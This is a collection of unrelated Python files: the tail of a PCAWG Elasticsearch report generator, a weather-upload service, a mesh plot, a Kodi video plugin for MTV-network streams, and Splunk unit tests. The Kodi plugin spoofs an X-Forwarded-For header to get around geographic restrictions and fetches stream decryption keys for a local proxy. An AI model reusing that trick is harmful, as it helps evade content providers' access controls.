"field": "tumor_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"bool": {
"should":[
{
"terms": {
"flags.is_dkfz_variant_calling_performed": [
"F"
]
}
},
{
"terms": {
"flags.is_embl_variant_calling_performed": [
"F"
]
}
}
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
],
# query 4: live_dkfz/embl_called_donors
[
# es_query for donor counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"exist_in_gnos_repo": {
"terms": {
"field": "variant_calling_results.dkfz_variant_calling.gnos_repo",
"size": 100
},
"aggs": {
"donors": {
"terms": {
"field": "donor_unique_id",
"size": 50000
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"terms": {
"flags.is_embl_variant_calling_performed": [
"T"
]
}
},
{
"terms": {
"flags.is_dkfz_variant_calling_performed": [
"T"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
],
# query 3: train2_donors
# query 4: train2_pilot_donors
]
def init_report_dir(metadata_dir, report_name, repo):
report_dir = metadata_dir + '/reports/' + report_name if not repo else metadata_dir + '/reports/' + report_name + '/' + repo
if not os.path.exists(report_dir):
os.makedirs(report_dir)
return report_dir
def generate_report(es_index, es_queries, metadata_dir, report_name, timestamp, repo):
# we need to run several queries to get facet counts for different type of donors
report = OrderedDict()
donors_per_repo = {}
count_types = [
"live_alignment_completed_donors",
"live_aligned_sanger_variant_not_called_donors",
"live_sanger_variant_called_donors",
"live_aligned_embl-dkfz_variant_not_called_donors",
"live_embl-dkfz_variant_called_donors"
#"train2_donors",
#"train2_pilot_donors"
]
for q_index in range(len(count_types)):
# get donor counts
response = es.search(index=es_index, body=es_queries[q_index][0])
#print json.dumps(response['aggregations']['gnos_f']) + '\n' # for debugging
donors_per_repo[count_types[q_index]] = {}
for p in response['aggregations']['gnos_f']['gnos_assignment'].get('buckets'):
count = p.get('doc_count')
original_gnos_repo = p.get('key')
donors_per_repo[count_types[q_index]][original_gnos_repo] = {}
repos = get_donors_per_repo(p.get('exist_in_gnos_repo').get('buckets'), donors_per_repo[count_types[q_index]][original_gnos_repo])
if not report.get(original_gnos_repo):
report[original_gnos_repo] = {}
if not report[original_gnos_repo].get(count_types[q_index]):
report[original_gnos_repo][count_types[q_index]] = {}
report[original_gnos_repo][count_types[q_index]]['count'] = [count] # first count is donor
report[original_gnos_repo][count_types[q_index]]['repos'] = repos
#print json.dumps(donors_per_repo) # for debugging
# get specimen counts
if len(es_queries[q_index]) >= 2:
response = es.search(index=es_index, body=es_queries[q_index][1])
#print json.dumps(response['aggregations']['gnos_f']) + '\n' # for debugging
else:
continue
for p in response['aggregations']['gnos_f']['gnos_assignment'].get('buckets'):
count_normal = p.get('doc_count')
count_tumor = p.get('tumor_specimens').get('doc_count')
original_gnos_repo = p.get('key')
repos = add_specimen_counts_per_repo(
report[original_gnos_repo][count_types[q_index]]['repos'],
p.get('normal_exists_in_gnos_repo').get('buckets'),
p.get('tumor_specimens').get('tumor_exists_in_gnos_repo').get('buckets'),
)
report[original_gnos_repo][count_types[q_index]]['count'].extend([count_normal, count_tumor]) # second count is specimen
report[original_gnos_repo][count_types[q_index]]['repos'] = repos
#print json.dumps(report) # for debug
report_dir = init_report_dir(metadata_dir, report_name, repo)
for ctype in count_types:
for ori_repo in donors_per_repo[ctype]:
for repo in donors_per_repo[ctype][ori_repo]:
with open(report_dir + '/' + ctype + '.' + ori_repo + '.' + repo + '.txt', 'w') as o:
o.write('\n'.join(donors_per_repo[ctype][ori_repo][repo]) + '\n')
repos = {}
for original_repo in report.keys():
repos[get_formal_repo_name(original_repo)] = {
"_ori_count": report[original_repo][ctype]['count'] if report.get(original_repo).get(ctype) else []
}
if not report.get(original_repo).get(ctype):
continue
for repo, count in report[original_repo][ctype]['repos'].iteritems():
repos[get_formal_repo_name(original_repo)][get_formal_repo_name(repo)] = count
with open(report_dir + '/' + ctype + '.repos.json', 'w') as o:
o.write(json.dumps(repos))
def get_formal_repo_name(repo):
repo_url_to_repo = {
"https://gtrepo-bsc.annailabs.com/": "bsc",
"bsc": "bsc",
"https://gtrepo-ebi.annailabs.com/": "ebi",
"ebi": "ebi",
"https://cghub.ucsc.edu/": "cghub",
"cghub": "cghub",
"https://gtrepo-dkfz.annailabs.com/": "dkfz",
"dkfz": "dkfz",
"https://gtrepo-riken.annailabs.com/": "riken",
"riken": "riken",
"https://gtrepo-osdc-icgc.annailabs.com/": "osdc-icgc",
"osdc-icgc": "osdc-icgc",
"https://gtrepo-osdc-tcga.annailabs.com/": "osdc-tcga",
"osdc-tcga": "osdc-tcga",
"https://gtrepo-etri.annailabs.com/": "etri",
"etri": "etri"
}
return repo_url_to_repo.get(repo)
def add_specimen_counts_per_repo(repos, repo_buckets_normal, repo_buckets_tumor):
for s in repo_buckets_normal:
if repos.get(s.get('key')):
repos[s.get('key')].append(s.get('doc_count') if s.get('doc_count') else 0)
for s in repo_buckets_tumor:
if repos.get(s.get('key')):
repos[s.get('key')].append(s.get('doc_count') if s.get('doc_count') else 0)
return repos
def get_donors_per_repo(repo_buckets, donors):
repos = {}
for d in repo_buckets:
repos[d.get('key')] = [d.get('doc_count')]
donors[get_formal_repo_name(d.get('key'))] = [ item.get('key').replace('::', '\t') for item in d.get('donors').get('buckets') ]
return repos
def main(argv=None):
if argv is None:
argv = sys.argv
else:
sys.argv.extend(argv)
parser = ArgumentParser(description="PCAWG Report Generator Using ES Backend",
formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-m", "--metadata_dir", dest="metadata_dir",
help="Directory containing metadata manifest files", required=True)
parser.add_argument("-r", "--gnos_repo", dest="repo",
help="Specify which GNOS repo to process, process all repos if none specified", required=False)
args = parser.parse_args()
metadata_dir = args.metadata_dir # this dir contains gnos manifest files, will also host all reports
repo = args.repo
if not os.path.isdir(metadata_dir): # TODO: should add more directory name check to make sure it's right
sys.exit('Error: specified metadata directory does not exist!')
timestamp = str.split(metadata_dir, '/')[-1]
es_index = 'p_' + ('' if not repo else repo+'_') + re.sub(r'\D', '', timestamp).replace('20','',1)
report_name = re.sub(r'^pc_report-', '', os.path.basename(__file__))
report_name = re.sub(r'\.py$', '', report_name)
generate_report(es_index, es_queries, metadata_dir, report_name, timestamp, repo)
return 0
if __name__ == "__main__":
sys.exit(main())
|
'''
Created on 2012-7-4
@author: Vigi
'''
import re
class Categorizer():
def __init__(self, file):
self.file = open(file, 'w')
def generateList(self):
"Generate list"
pass
def startPage(self):
self.file.write(r'<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><title>')
m = re.match(r"[\.\\a-zA-Z]*?\\([a-zA-Z]*)\.html", self.file.name)
self.file.write(m.group(1))
self.file.write(r'</title><script language="javascript">function select(obj){var links = document.getElementsByTagName("a");for(i=0;i<links.length;i++){links[i].style.fontWeight="normal"}obj.style.fontWeight="bold"}</script></head><body>')
def endPage(self):
self.file.write(r'</body></html>')
self.file.close()
def writeToHTML(self):
self.startPage()
self.generateList()
self.endPage()
|
"""Upload current temperature to temperatur.nu.
temperatur.nu is a Swedish web site that shows the current temperature
in many places.
* Web site: http://www.temperatur.nu/
* Additional dependency: http://docs.python-requests.org/
* Example ``weather.ini`` configuration::
[temperaturnu]
hash = longhexnumber
[live]
services = ['temperaturnu', 'underground']
[logged]
services = ['temperaturnu', 'underground']
You receive the hash value from the temperatur.nu admins during sign
up. It looks like ``d3b07384d113edec49eaa6238ad5ff00``.
.. _temperatur.nu: http://www.temperatur.nu/
"""
from __future__ import absolute_import, unicode_literals
from contextlib import contextmanager
from datetime import timedelta
import logging
import os
import sys
import requests
import pywws.service
__docformat__ = "restructuredtext en"
service_name = os.path.splitext(os.path.basename(__file__))[0]
logger = logging.getLogger(__name__)
class ToService(pywws.service.LiveDataService):
config = {'hash': ('', True, 'hash')}
logger = logger
service_name = service_name
template = "#live##temp_out \"'t': '%.1f',\"#"
@contextmanager
def session(self):
with requests.Session() as session:
yield session
def valid_data(self, data):
return data['temp_out'] is not None
def upload_data(self, session, prepared_data={}):
try:
rsp = session.get('http://www.temperatur.nu/rapportera.php',
params=prepared_data, timeout=60)
except Exception as ex:
return False, repr(ex)
if rsp.status_code != 200:
return False, 'http status: {:d}'.format(rsp.status_code)
text = rsp.text.strip()
if text:
return True, 'server response "{:s}"'.format(text)
return True, 'OK'
if __name__ == "__main__":
sys.exit(pywws.service.main(ToService))
|
from abapy.mesh import Mesh, Nodes, RegularQuadMesh
import matplotlib.pyplot as plt
from numpy import cos, pi
def function(x, y, z, labels):
r = (x**2 + y**2)**.5
return cos(2*pi*x)*cos(2*pi*y)/(r+1.)
N1, N2 = 100, 25
l1, l2 = 4., 1.
Ncolor = 20
mesh = RegularQuadMesh(N1 = N1, N2 = N2, l1 = l1, l2 = l2)
field = mesh.nodes.eval_function(function)
x,y,z = mesh.get_edges() # Mesh edges
X,Y,Z,tri = mesh.dump2triplot()
xb,yb,zb = mesh.get_border()
fig = plt.figure(figsize=(16,4))
fig.gca().set_aspect('equal')
fig.frameon = True
plt.plot(xb,yb,'k-', linewidth = 2.)
plt.xticks([0,l1],['$0$', '$l_1$'], fontsize = 15.)
plt.yticks([0,l2],['$0$', '$l_2$'], fontsize = 15.)
plt.tricontourf(X,Y,tri,field.data, Ncolor)
plt.tricontour(X,Y,tri,field.data, Ncolor, colors = 'black')
plt.show()
|
import common
import connection
import m3u8
import base64
import datetime
import os
import ustvpaths
import re
import simplejson
import sys
import threading
import time
import urllib
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
from bs4 import BeautifulSoup, SoupStrainer
try:
from pycaption import detect_format, SRTWriter
except:
detect_format = None
from Queue import PriorityQueue
addon = xbmcaddon.Addon()
player = common.XBMCPlayer()
pluginHandle = int(sys.argv[1])
VIDEOURL = 'http://media.mtvnservices.com/'
VIDEOURLAPI = 'http://media-utils.mtvnservices.com/services/MediaGenerator/%s'
VIDEOURLAPIHLS = 'http://media-utils.mtvnservices.com/services/MediaGenerator/%s?device=Android&deviceOsVersion=4.4.4'
TYPES = [('fullEpisodes' , 'Full Episodes'), ('bonusClips,afterShowsClips,recapsClips,sneakPeeksClips,dailies,showClips' , 'Extras')]
DEVICE = 'Xbox'
BITRATERANGE = 10
TIMEOUT = 50
class Thread(threading.Thread):
def __init__(self, target, *args):
self._target = target
self._args = args
threading.Thread.__init__(self)
def run(self):
self._target(*self._args)
def masterlist(SITE, SHOWS):
master_db = []
master_data = connection.getURL(SHOWS)
master_tree = simplejson.loads(master_data)
for master_item in master_tree['promoList']['promos']:
try:
master_item = master_item['promo']['associatedContent']['series']
master_name = master_item['title']
master_id = master_item['seriesId']
if master_id is not None:
master_db.append((master_name, SITE, 'seasons', master_id))
else:
pass
except:
pass
return master_db
def seasons(SITE, API, season_id = common.args.url):
seasons = []
count = 0
for type in TYPES:
season_url = API + 'series/' + season_id + '/playlists.json?page=0&pageSize=500&type=' + type[0]
season_data = connection.getURL(season_url)
try:
season_tree = simplejson.loads(season_data)['series']['playlists']
for season_item in season_tree:
try:
if (season_item['playlist']['distributionPolicies'][0]['distributionPolicy']['policyType'] == 'playable'):
count = count + 1
except:
if (season_item['playlist']['distributionPolicies'][0]['policyType'] == 'playable'):
count = count + 1
else:
count = count
if count > 0:
seasons.append((type[1], SITE, 'episodes', season_url, -1, -1))
except:
pass
return seasons
def episodes(SITE, episode_url = common.args.url):
episodes = []
episode_data = connection.getURL(episode_url)
episode_tree = simplejson.loads(episode_data)
for episode_item in episode_tree['series']['playlists']:
show_name = episode_tree['series']['title']
episode_item = episode_item['playlist']
if '|' in episode_item['headline']:
episode_name = episode_item['headline'].split('|')[-1].strip()
elif '- ' in episode_item['headline']:
episode_name = episode_item['headline'].split('- ')[-1].strip()
else:
try:
episode_name = episode_item['headline'].split(':')[1].strip()
except:
episode_name = episode_item['headline']
try:
episode_info = re.compile('[s|S]([0-9]).[e|E]?([0-9]{0,2}).*').findall(episode_item['title'])
try:
episode_season, episode_number = episode_info[0]
except:
episode_season = episode_info
episode_number = -1
except:
episode_season = -1
episode_number = -1
url = episode_item['id']
try:
episode_plot = episode_item['subhead']
except:
episode_plot = ''
episode_thumb = episode_item['image']
try:
episode_duration = common.format_seconds(episode_item['duration']['timecode'])
except:
continue
episode_type = episode_item['contentType'][:-1]
episode_airdate = common.format_date(epoch = episode_item['postedDate']['timestamp'])
u = sys.argv[0]
u += '?url="' + urllib.quote_plus(url) + '"'
u += '&mode="' + SITE + '"'
u += '&sitemode="play"'
infoLabels = { 'title' : episode_name,
'plot' : episode_plot,
'durationinseconds' : episode_duration,
'TVShowTitle' : show_name,
'season' : episode_season,
'episode' : episode_number,
'premiered' : episode_airdate}
try:
if (episode_item['distributionPolicies'][0]['distributionPolicy']['policyType'] == 'playable'):
episodes.append((u, episode_name, episode_thumb, infoLabels, 'list_qualities', False, episode_type))
except:
if (episode_item['distributionPolicies'][0]['policyType'] == 'playable'):
episodes.append((u, episode_name, episode_thumb, infoLabels, 'list_qualities', False, episode_type))
else:
pass
return episodes
def play_video(BASE, video_uri = common.args.url, media_base = VIDEOURL):
video_url = media_base + video_uri
try:
qbitrate = common.args.quality
except:
qbitrate = None
video_url2 = 'stack://'
closedcaption = []
exception = False
queue = PriorityQueue()
segments = []
if 'feed' in video_uri:
feed_url = video_uri
else:
swf_url = connection.getRedirect(video_url, header = {'Referer' : BASE})
params = dict(item.split("=") for item in swf_url.split('?')[1].split("&"))
uri = urllib.unquote_plus(params['uri'])
config_url = urllib.unquote_plus(params['CONFIG_URL'].replace('Other', DEVICE))
config_data = connection.getURL(config_url, header = {'Referer' : video_url, 'X-Forwarded-For' : '12.13.14.15'})
config_tree = BeautifulSoup(config_data, 'html.parser')
if not config_tree.error:
feed_url = config_tree.feed.string
uri = urllib.quote_plus(uri)
feed_url = feed_url.replace('{uri}', uri).replace('&', '&').replace('{device}', DEVICE).replace('{ref}', 'None').replace('{type}', 'network').strip()
else:
exception = True
error_text = config_tree.error.string.split('/')[-1].split('_')
if error_text[1] == 'loc':
params = dict(item.split("=") for item in config_url.split('?')[-1].split('&'))
common.show_exception('Geo', params['geo'])
if not exception:
feed_data = connection.getURL(feed_url, header = {'X-Forwarded-For' : '12.13.14.15'})
video_tree = BeautifulSoup(feed_data, 'html.parser', parse_only = SoupStrainer('media:group'))
video_segments = video_tree.find_all('media:content')
if not video_segments:
video_tree = BeautifulSoup(feed_data, 'html.parser')
common.show_exception(video_tree.find('meta', property = "og:site_name")['content'], video_tree.find('meta', property = "og:url")['content'])
exception = True
threads = []
for i, video_item in enumerate(video_segments):
try:
threads.append(Thread(get_videos, queue, i, video_item, qbitrate, False))
except Exception, e:
print "Exception: ", e
[i.start() for i in threads]
[i.join() for i in threads]
while not queue.empty():
video_data2 = queue.get()
video_url2 += video_data2[1] + ' , '
segments.append(video_data2[2])
closedcaption.append((video_data2[3], int(video_data2[0])))
player._segments_array = segments
finalurl = video_url2[:-3]
time.sleep(20)
if (addon.getSetting('enablesubtitles') == 'true') and closedcaption and detect_format is not None:
convert_subtitles(closedcaption)
player._subtitles_Enabled = True
item = xbmcgui.ListItem(path = finalurl)
if player._localHTTPServer:
filestring = 'XBMC.RunScript(' + os.path.join(ustvpaths.LIBPATH,'proxy.py') + ', 12345)'
xbmc.executebuiltin(filestring)
finalurl = video_url2[:-3]
#localhttpserver = True
time.sleep(20)
queue.task_done()
try:
item.setThumbnailImage(common.args.thumb)
except:
pass
try:
item.setInfo('Video', { 'title' : common.args.name,
'season' : common.args.season_number,
'episode' : common.args.episode_number,
'TVShowTitle' : common.args.show_title })
except:
pass
xbmcplugin.setResolvedUrl(pluginHandle, True, item)
while player.is_active:
player.sleep(250)
def play_video2(API, video_url = common.args.url, rtmp = True):
try:
qbitrate = common.args.quality
except:
qbitrate = None
video_url2 = 'stack://'
threads = []
segments = []
closedcaption = []
queue = PriorityQueue()
video_data = connection.getURL(API + 'playlists/%s/videos.json' % video_url)
video_tree = simplejson.loads(video_data)
video_item = video_tree['playlist']['videos']
for i in range(0, len(video_item)):
try:
threads.append(Thread(get_videos, queue, i, video_item[i], qbitrate, rtmp))
except Exception, e:
print "Exception: ", e
[i.start() for i in threads]
[i.join() for i in threads]
while not queue.empty():
video_data2 = queue.get()
video_url2 += video_data2[1] + ' , '
segments.append(video_data2[2])
closedcaption.append((video_data2[3], int(video_data2[0])))
player._segments_array = segments
finalurl = video_url2[:-3]
if (addon.getSetting('enablesubtitles') == 'true') and closedcaption and detect_format is not None:
convert_subtitles(closedcaption)
player._subtitles_Enabled = True
item = xbmcgui.ListItem(path = finalurl)
queue.task_done()
try:
item.setThumbnailImage(common.args.thumb)
except:
pass
try:
item.setInfo('Video', { 'title' : common.args.name,
'season' : common.args.season_number,
'episode' : common.args.episode_number,
'TVShowTitle' : common.args.show_title })
except:
pass
xbmcplugin.setResolvedUrl(pluginHandle, True, item)
while player.is_active:
player.sleep(250)
def get_videos(queue, i, video_item, qbitrate, rtmp = False):
try:
video_mgid = video_item['video']['mgid']
except:
try:
video_mgid = video_item['url'].split('uri=')[1].split('&')[0]
except:
try:
video_mgid = video_item['url'].split('mgid=')[1].split('&')[0]
except:
video_mgid = video_item['url'].split('/')[-1].split('?')[0]
video_data = connection.getURL(VIDEOURLAPI % video_mgid)
video_tree = BeautifulSoup(video_data, 'html.parser')
try:
duration = video_tree.findAll('rendition')[0]['duration']
except:
duration = 0
try:
closedcaption = video_tree.find('typographic', format = 'ttml')['src']
except:
closedcaption = None
hbitrate = -1
lbitrate = -1
sbitrate = int(addon.getSetting('quality'))
if rtmp:
try:
video_url2 = video_tree.findAll('rendition')
if qbitrate is None:
for video_index in video_url2:
bitrate = int(video_index['bitrate'])
if bitrate < lbitrate or lbitrate == -1:
lbitrate = bitrate
lplaypath_url = video_index.src.string
if bitrate > hbitrate and bitrate <= sbitrate:
hbitrate = bitrate
playpath_url = video_index.src.string
else:
playpath_url = video_tree.find('rendition', bitrate = qbitrate).src.string
if playpath_url is None:
playpath_url = lplaypath_url
if "gsp.alias" in playpath_url:
file_name = 'rtmpe://cp10740.edgefcs.net/ondemand/mtvnorigin/gsp.alias' + playpath_url.split('/gsp.alias')[1]
else:
file_name = playpath_url
queue.put([i, file_name, duration, closedcaption])
except:
pass
else:
try:
video_data = connection.getURL(VIDEOURLAPIHLS % video_mgid)
video_tree = BeautifulSoup(video_data, 'html.parser')
video_menu = video_tree.src.string
hbitrate = -1
lbitrate = -1
m3u8_url = None
#can we just pass video_menu
if addon.getSetting('sel_quality') == 'true' or qbitrate is not None or int(xbmc.getInfoLabel( "System.BuildVersion" )[:2]) < 14 or common.use_proxy() :
m3u8_master_data = connection.getURL(video_menu, savecookie = True, cookiefile = i)
m3u8_master = m3u8.parse(m3u8_master_data)
sbitrate = int(addon.getSetting('quality')) * 1024
for video_index in m3u8_master.get('playlists'):
bitrate = int(video_index.get('stream_info')['bandwidth'])
if qbitrate is None:
if bitrate < lbitrate or lbitrate == -1:
lbitrate = bitrate
lm3u8_url = video_index.get('uri')
if bitrate > hbitrate and bitrate <= sbitrate:
hbitrate = bitrate
m3u8_url = video_index.get('uri')
elif (qbitrate * (100 - BITRATERANGE)) / 100 < bitrate and (qbitrate * (100 + BITRATERANGE)) / 100 > bitrate:
m3u8_url = video_index.get('uri')
if ((m3u8_url is None) and (qbitrate is None)):
m3u8_url = lm3u8_url
m3u8_data = connection.getURL(m3u8_url, loadcookie = True, cookiefile = i)
key_url = re.compile('URI="(.*?)"').findall(m3u8_data)[0]
key_data = connection.getURL(key_url, loadcookie = True, cookiefile = i)
key_file = open(ustvpaths.KEYFILE % str(i), 'wb')
key_file.write(key_data)
key_file.close()
video_url = re.compile('(http:.*?)\n').findall(m3u8_data)
for video_item in video_url:
newurl = base64.b64encode(video_item)
newurl = urllib.quote_plus(newurl)
m3u8_data = m3u8_data.replace(video_item, 'http://127.0.0.1:12345/' + str(i) + '/foxstation/' + newurl)
m3u8_data = m3u8_data.replace(key_url, 'http://127.0.0.1:12345/play%s.key' % str(i))
file_name = ustvpaths.PLAYFILE.replace('.m3u8', str(i) + '.m3u8')
playfile = open(file_name, 'w')
playfile.write(m3u8_data)
playfile.close()
else:
print "********************* No sel*****************"
file_name = video_menu
player._localHTTPServer = False
queue.put([i, file_name, duration, closedcaption])
except:
pass
def list_qualities(BASE, video_url = common.args.url, media_base = VIDEOURL):
bitrates = []
if media_base not in video_url:
video_url = media_base + video_url
exception = False
if 'feed' not in video_url:
swf_url = connection.getRedirect(video_url, header = {'Referer' : BASE})
params = dict(item.split("=") for item in swf_url.split('?')[1].split("&"))
uri = urllib.unquote_plus(params['uri'])
config_url = urllib.unquote_plus(params['CONFIG_URL'].replace('Other', DEVICE))
config_data = connection.getURL(config_url, header = {'Referer' : video_url, 'X-Forwarded-For' : '12.13.14.15'})
config_tree = BeautifulSoup(config_data, 'html.parser')
if not config_tree.error:
feed_url = config_tree.feed.string
feed_url = feed_url.replace('{uri}', uri).replace('&', '&').replace('{device}', DEVICE).replace('{ref}', 'None').replace('{type}', 'normal').strip()
else:
exception = True
error_text = config_tree.error.string.split('/')[-1].split('_')
common.show_exception(error_text[1], error_text[2])
else:
feed_url = video_url
if not exception:
feed_data = connection.getURL(feed_url)
video_tree = BeautifulSoup(feed_data, 'html.parser', parse_only = SoupStrainer('media:group'))
video_segments = video_tree.find_all('media:content')
video_segment = video_segments[0]
video_url3 = video_segment['url'].replace('{device}', DEVICE)
video_data3 = connection.getURL(video_url3, header = {'X-Forwarded-For' : '12.13.14.15'})
video_tree3 = BeautifulSoup(video_data3, 'html.parser')
video_menu = video_tree3.find('src').string
m3u8_url = None
m3u_master_data = connection.getURL(video_menu, savecookie = True)
m3u_master = m3u8.parse(m3u_master_data)
for video_index in m3u_master.get('playlists'):
bitrate = int(video_index.get('stream_info')['bandwidth'])
display = int(bitrate) / 1024
bitrates.append((display, bitrate))
return bitrates
def list_qualities2(API, video_url = common.args.url):
video_bitrates = []
video_data = connection.getURL(API + 'playlists/%s/videos.json' % video_url)
video_tree = simplejson.loads(video_data)
video_mgid = video_tree['playlist']['videos'][0]['video']['mgid']
video_data2 = connection.getURL(VIDEOURLAPI % video_mgid)
video_tree2 = BeautifulSoup(video_data2, 'html.parser')
video_url2 = video_tree2.findAll('rendition')
for video_index in video_url2:
video_bitrate = int(video_index['bitrate'])
video_bitrates.append((video_bitrate, video_bitrate))
return video_bitrates
def convert_subtitles(closedcaption):
str_output = ''
count = 0
for closedcaption_url, i in closedcaption:
count = int(i) + 1
if closedcaption_url is not None:
try:
cc_content = common.smart_unicode(connection.getURL(closedcaption_url, connectiontype = 0).replace(' 9137', ''))
reader = detect_format(cc_content)
if reader:
str_output = common.smart_utf8(SRTWriter().write(reader().read(cc_content)))
file = open(os.path.join(ustvpaths.DATAPATH, 'subtitle-%s.srt' % str(count)), 'w')
file.write(str_output)
str_output=''
file.close()
else:
print "Unknown sub type"
except Exception, e:
print "Exception with Subs: ", e
|
import sys, unittest
sys.path.append('../bin')
sample_input_1 = open('sample_input_from_splunk_1.csv', 'r')
sample_input_2 = open('sample_input_from_splunk_2.csv', 'r')
sys.stdin = sample_input_1
import stateChange
class RSVSTARTTestCase(unittest.TestCase):
def setUp(self):
# for these tests, we expect some input from Splunk
sys.stdin = sample_input_1
stateChange.node_states = {}
stateChange.node_trasitions = {}
stateChange.output_results = []
stateChange.trigger_options = {}
def test_state_change_for_simple_set(self):
stateChange.trigger_options['-SYS_Threshold'] = 2
stateChange.trigger_options['USR-ERR_Threshold'] = 1
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'ERR')
stateChange.update_output_results_for_node({'_time':'2', 'nids':'n2'}, 'n5', '*', 'SYS')
stateChange.update_output_results_for_node({'_time':'3', 'nids':'n6'}, 'n6', '*', 'SYS')
self.assertEqual(stateChange.output_results[1], {'_time':'1', 'systemStateChange':'USR-ERR', 'crossing': 'increasing'})
self.assertEqual(stateChange.output_results[-1], {'_time':'3', 'systemStateChange':'UNK-SYS', 'crossing': 'increasing'})
def test_state_change_for_simple_set2(self):
# return # IGNORE FOR NOW, but would be nice to base thresholds on a single state rather than transition
stateChange.trigger_options['SYS_Threshold'] = 2
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'ERR')
stateChange.update_output_results_for_node({'_time':'2', 'nids':'n2'}, 'n5', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'3', 'nids':'n6'}, 'n6', 'ERR', 'SYS')
self.assertEqual(stateChange.output_results[-1], {'_time':'3', 'systemStateChange':'SYS', 'crossing': 'increasing'})
class TriggerEventsTestCase(unittest.TestCase):
def setUp(self):
# for these tests, we expect some input from Splunk
sys.stdin = sample_input_1
stateChange.node_states = {}
stateChange.node_trasitions = {}
stateChange.output_results = []
stateChange.trigger_options = {}
def test_state_change_for_simple_set(self):
stateChange.trigger_options['SYS-ERR_Threshold'] = 2
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'2', 'nids':'n2'}, 'n5', 'SYS', 'ERR')
stateChange.update_output_results_for_node({'_time':'3', 'nids':'n6'}, 'n6', 'SYS', 'ERR')
self.assertEqual(stateChange.output_results[-1], {'_time':'3', 'systemStateChange':'SYS-ERR', 'crossing': 'increasing'})
def test_state_change_for_more_complex_set(self):
stateChange.trigger_options['SYS-ERR_Threshold'] = 2
stateChange.trigger_options['ERR-USR_Threshold'] = 3
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'2', 'nids':'n5'}, 'n5', 'SYS', 'ERR') # + 1 for sys-err
stateChange.update_output_results_for_node({'_time':'3', 'nids':'n6'}, 'n6', 'SYS', 'ERR') # + 1 for sys-err trigger up for sys-err
stateChange.update_output_results_for_node({'_time':'4', 'nids':'n5'}, 'n5', 'ERR', 'USR') # - 1 for sys-err, + 1 for err-usr, trigger down for sys-err
stateChange.update_output_results_for_node({'_time':'5', 'nids':'n6'}, 'n6', 'ERR', 'USR') # + 1 for err-usr
stateChange.update_output_results_for_node({'_time':'6', 'nids':'n7'}, 'n7', 'ERR', 'USR') # + 1 for err-usr, trigger up for err-usr
stateChange.update_output_results_for_node({'_time':'7', 'nids':'n8'}, 'n8', 'ERR', 'USR') # + 1 for err-usr
self.assertTrue({'_time':'3', 'systemStateChange':'SYS-ERR', 'crossing': 'increasing'} in stateChange.output_results)
self.assertTrue({'_time':'4', 'systemStateChange':'SYS-ERR', 'crossing': 'decreasing'} in stateChange.output_results)
self.assertTrue({'_time':'6', 'systemStateChange':'ERR-USR', 'crossing': 'increasing'} in stateChange.output_results)
self.assertTrue({'_time':'3', 'nids':'n6', 'nodeStateChange': 'SYS-ERR', 'ERR':2, 'SYS':0} in stateChange.output_results)
self.assertTrue({'_time':'4', 'nids':'n5', 'nodeStateChange': 'ERR-USR', 'USR':1, 'ERR':1} in stateChange.output_results)
self.assertTrue({'_time':'6', 'nids':'n7', 'nodeStateChange': 'ERR-USR', 'USR':3, 'ERR':0} in stateChange.output_results)
class AggregateEventsTestCase(unittest.TestCase):
def setUp(self):
# for these tests, we expect some input from Splunk
sys.stdin = sample_input_1
stateChange.node_states = {}
stateChange.output_results = []
def test_output_results_should_contain_an_aggregate_event(self):
# record, node, start_state, end_state
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n2', 'USR', 'ERR')
stateChange.build_aggregate_event({'_time':'1'})
self.assertEqual(stateChange.output_results[-1], {'_time':'1', 'eventtype':'nodeStateList', 'StateName_SYS':'n1', 'StateName_ERR': 'n2'})
def test_more_complicated_output_results_should_contain_an_aggregate_event(self):
# record, node, start_state, end_state
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n2', 'USR', 'ERR')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n3', 'USR', 'ERR')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n4', 'USR', 'ERR')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n5', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n6', 'USR', 'SYS')
stateChange.build_aggregate_event({'_time':'1'})
